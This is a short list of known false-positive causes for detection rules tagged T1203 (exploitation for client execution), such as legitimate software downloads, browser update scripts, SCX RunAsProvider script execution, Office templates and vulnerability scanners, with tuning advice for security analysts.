LoFP LoFP / t1203

t1203

TitleTags
all kind of software downloads
all kinds of software downloads
exploits that were attempted but unsuccessful.
it is highly recommended to baseline your activity and tune out common business use cases.
legitimate browser install, update and recovery scripts
legitimate use of scx runasprovider executescript.
legitimate use of scx runasprovider invoke_executeshellcommand.
office documents commonly have templates that refer to external addresses, like \"sharepoint.ourcompany.com\" may have to be tuned.
scanning attempts with the abnormal use of the http post method with no indication of code execution within the http client (request) body. an example would be vulnerability scanners trying to identify unpatched versions while not actually exploiting the vulnerability. see description for investigation tips.
unlikely
you may have to tune certain domains out that excel may call out to, such as microsoft or other business use case domains.